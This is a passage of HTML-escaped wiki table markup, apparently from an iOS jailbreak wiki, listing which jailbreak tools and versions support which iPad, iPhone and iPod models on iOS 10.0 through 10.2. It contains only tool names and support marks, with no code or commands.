&amp;lt;ref name=&amp;quot;ipad25&amp;quot;&amp;gt;[[P105AP|iPad mini (Wi-Fi) (iPad2,5)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipad31&amp;quot;&amp;gt;[[J1AP|iPad (3rd generation) (Wi-Fi) (iPad3,1)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipad32&amp;quot;&amp;gt;[[J2AP|iPad (3rd generation) (GSM) (iPad3,2)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipad33&amp;quot;&amp;gt;[[J2AAP|iPad (3rd generation) (CDMA) (iPad3,3)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;iphone52&amp;quot;&amp;gt;[[N42AP|iPhone 5 (Global) (iPhone5,2)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;iphone53&amp;quot;&amp;gt;[[N48AP|iPhone 5c (GSM) (iPhone5,3)]] only.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====10.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;22&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad (4th generation)]]&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad Pro (12.9-inch)]]&lt;br /&gt;
! [[iPad Pro (9.7-inch)]]&lt;br /&gt;
! [[iPad (5th generation)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (2nd generation)]]&lt;br /&gt;
! [[iPad Pro (10.5-inch)]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPad mini 3]]&lt;br /&gt;
! [[iPad mini 4]]&lt;br /&gt;
! [[iPhone 5]]&lt;br /&gt;
! [[iPhone 5c]]&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[N61AP|iPhone 6]]&lt;br /&gt;
! [[N56AP|iPhone 6 Plus]]&lt;br /&gt;
! [[iPhone 6s]]&lt;br /&gt;
! [[iPhone 6s Plus]]&lt;br /&gt;
! [[iPhone SE (1st generation)]]&lt;br /&gt;
! [[iPhone 7]]&lt;br /&gt;
! [[iPhone 7 Plus]]&lt;br /&gt;
! [[N102AP|iPod touch (6th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 10.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| colspan=&amp;quot;19&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | 10.0.1&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]&lt;br /&gt;
| beta 4&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.5.1 (Windows)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[yalu102]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2-beta 6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | 10.0.2&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]&lt;br /&gt;
| beta 4&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC4-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.5.1 (Windows)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[yalu102]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2-beta 6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 10.0.3&lt;br /&gt;
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]&lt;br /&gt;
| beta 4&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;19&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9  - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;11&amp;quot; | 10.1&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;11&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]&lt;br /&gt;
| beta 1-beta 4&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.5.1 (Windows)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#yalu_.2B_mach_portal_.2810.1-10.1.1.29|yalu + mach_portal]]&lt;br /&gt;
| beta 1-beta 3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[yalu102]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2-beta 6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;11&amp;quot; | 10.1.1&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;11&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]&lt;br /&gt;
| beta 1-beta 4&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.5.1 (Windows)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Yalu#yalu_.2B_mach_portal_.2810.1-10.1.1.29|yalu + mach_portal]]&lt;br /&gt;
| beta 1-beta 3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[yalu102]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2-beta 6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | 10.2&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC3-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.5.1 (Windows)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Saïgon]]&lt;br /&gt;
| beta 3&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[yalu102]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2-beta 6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
